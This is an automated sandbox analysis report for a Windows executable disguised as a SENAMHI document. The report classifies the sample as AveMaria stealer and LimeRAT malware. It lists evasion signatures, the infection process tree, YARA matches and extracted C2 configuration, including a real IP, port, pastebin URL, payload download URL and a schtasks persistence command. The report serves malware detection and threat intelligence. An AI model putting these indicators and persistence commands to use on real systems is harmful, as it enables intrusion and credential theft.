Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DocumentoSENAMHI20222103.exe

Overview

General Information

Sample Name:DocumentoSENAMHI20222103.exe
Analysis ID:593268
MD5:81ba3d2de48272d692c4e6604e6b1db9
SHA1:921e7008881d5e0e9a788ee310ddef60b343c647
SHA256:eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
Infos:

Detection

AveMaria LimeRAT UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected LimeRAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Sigma detected: Suspicious Add Scheduled Task Parent
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • DocumentoSENAMHI20222103.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe" MD5: 81BA3D2DE48272D692C4E6604E6B1DB9)
    • cmd.exe (PID: 1033668 cmdline: C:\Windows\System32\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1033676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • wtqsCpda..exe (PID: 1033924 cmdline: "C:\Users\user\AppData\Roaming\wtqsCpda..exe" MD5: 3D7801D573CAB12F3093C219EBFE495C)
      • schtasks.exe (PID: 1034124 cmdline: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'" MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • conhost.exe (PID: 1034132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chrome.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\chrome.exe" MD5: 3D7801D573CAB12F3093C219EBFE495C)
  • chrome.exe (PID: 1034204 cmdline: C:\Users\user\AppData\Local\Temp\chrome.exe MD5: 3D7801D573CAB12F3093C219EBFE495C)
  • cleanup
{"C2 url": "https://pastebin.com/raw/03PEm7js", "AES Key": "150797", "ENDOF": "|'N'|", "Seprator": "|'L'|", "Install File": "True", "Install Dir": "temp", "Version": "v4.0"}
{"C2 url": "172.111.242.20", "port": 2031}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\chrome.exeJoeSecurity_LimeRATYara detected LimeRATJoe Security
    C:\Users\user\AppData\Local\Temp\chrome.exeMALWARE_Win_LimeRATLimeRAT payloadditekSHen
    • 0x66dc:$s1: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr
    • 0x5efa:$s2: \vboxhook.dll
    • 0x63a2:$s3: Win32_Processor.deviceid="CPU0"
    • 0x62c4:$s4: select CommandLine from Win32_Process where Name='{0}'
    • 0x6380:$s5: Minning...
    • 0x6332:$s6: Regasm.exe
    • 0x67de:$s7: Flood!
    • 0x61c4:$s8: Rans-Status
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeJoeSecurity_LimeRATYara detected LimeRATJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeMALWARE_Win_LimeRATLimeRAT payloadditekSHen
      • 0x66dc:$s1: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr
      • 0x5efa:$s2: \vboxhook.dll
      • 0x63a2:$s3: Win32_Processor.deviceid="CPU0"
      • 0x62c4:$s4: select CommandLine from Win32_Process where Name='{0}'
      • 0x6380:$s5: Minning...
      • 0x6332:$s6: Regasm.exe
      • 0x67de:$s7: Flood!
      • 0x61c4:$s8: Rans-Status
      C:\Users\user\AppData\Roaming\wtqsCpda..exeJoeSecurity_LimeRATYara detected LimeRATJoe Security
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_LimeRATYara detected LimeRATJoe Security
          00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_LimeRATYara detected LimeRATJoe Security
                00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                • 0x1972f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                • 0x1972f:$c1: Elevation:Administrator!new:
                Click to see the 42 entries
                SourceRuleDescriptionAuthorStrings
                15.0.wtqsCpda..exe.540000.3.unpackJoeSecurity_LimeRATYara detected LimeRATJoe Security
                  15.0.wtqsCpda..exe.540000.3.unpackMALWARE_Win_LimeRATLimeRAT payloadditekSHen
                  • 0x66dc:$s1: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr
                  • 0x5efa:$s2: \vboxhook.dll
                  • 0x63a2:$s3: Win32_Processor.deviceid="CPU0"
                  • 0x62c4:$s4: select CommandLine from Win32_Process where Name='{0}'
                  • 0x6380:$s5: Minning...
                  • 0x6332:$s6: Regasm.exe
                  • 0x67de:$s7: Flood!
                  • 0x61c4:$s8: Rans-Status
                  19.0.chrome.exe.a20000.0.unpackJoeSecurity_LimeRATYara detected LimeRATJoe Security
                    19.0.chrome.exe.a20000.0.unpackMALWARE_Win_LimeRATLimeRAT payloadditekSHen
                    • 0x66dc:$s1: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr
                    • 0x5efa:$s2: \vboxhook.dll
                    • 0x63a2:$s3: Win32_Processor.deviceid="CPU0"
                    • 0x62c4:$s4: select CommandLine from Win32_Process where Name='{0}'
                    • 0x6380:$s5: Minning...
                    • 0x6332:$s6: Regasm.exe
                    • 0x67de:$s7: Flood!
                    • 0x61c4:$s8: Rans-Status
                    18.2.chrome.exe.760000.0.unpackJoeSecurity_LimeRATYara detected LimeRATJoe Security
                      Click to see the 103 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: frack113: Data: Command: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", CommandLine: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wtqsCpda..exe" , ParentImage: C:\Users\user\AppData\Roaming\wtqsCpda..exe, ParentProcessId: 1033924, ProcessCommandLine: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", ProcessId: 1034124
                      Source: Process startedAuthor: Florian Roth: Data: Command: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", CommandLine: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wtqsCpda..exe" , ParentImage: C:\Users\user\AppData\Roaming\wtqsCpda..exe, ParentProcessId: 1033924, ProcessCommandLine: schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'", ProcessId: 1034124
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\wtqsCpda..exe, ProcessId: 1033924, TargetFilename: C:\Users\user\AppData\Local\Temp\chrome.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\chrome.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\chrome.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\chrome.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\chrome.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wtqsCpda..exe" , ParentImage: C:\Users\user\AppData\Roaming\wtqsCpda..exe, ParentProcessId: 1033924, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\chrome.exe" , ProcessId: 6672

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://172.111.242.20/Chrome.exeTTC:Avira URL Cloud: Label: malware
                      Source: http://172.111.242.20/Chrome.exerAvira URL Cloud: Label: malware
                      Source: 172.111.242.20Avira URL Cloud: Label: malware
                      Source: http://172.111.242.20/Chrome.exelrAvira URL Cloud: Label: malware
                      Source: http://172.111.242.20/Chrome.exenAvira URL Cloud: Label: malware
                      Source: http://172.111.242.20/Chrome.exeAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: 18.2.chrome.exe.760000.0.unpackMalware Configuration Extractor: LimeRAT {"C2 url": "https://pastebin.com/raw/03PEm7js", "AES Key": "150797", "ENDOF": "|'N'|", "Seprator": "|'L'|", "Install File": "True", "Install Dir": "temp", "Version": "v4.0"}
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "172.111.242.20", "port": 2031}
                      Source: DocumentoSENAMHI20222103.exeReversingLabs: Detection: 16%
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeReversingLabs: Detection: 92%
                      Source: C:\Users\user\AppData\Local\Temp\IconLib.dllMetadefender: Detection: 31%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\IconLib.dllReversingLabs: Detection: 22%
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeReversingLabs: Detection: 92%
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeReversingLabs: Detection: 92%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeJoe Sandbox ML: detected
                      Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpackAvira: Label: TR/Redcap.ghjpt
                      Source: 1.0.DocumentoSENAMHI20222103.exe.bd0000.0.unpackAvira: Label: ADWARE/Adware.Gen8
                      Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpackAvira: Label: TR/Patched.Ren.Gen3
                      Source: 1.2.DocumentoSENAMHI20222103.exe.bd0000.0.unpackAvira: Label: ADWARE/Adware.Gen8

                      Exploits

                      barindex
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DocumentoSENAMHI20222103.exe PID: 6576, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.11.20:49764 version: TLS 1.0
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
                      Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
                      Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
                      Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
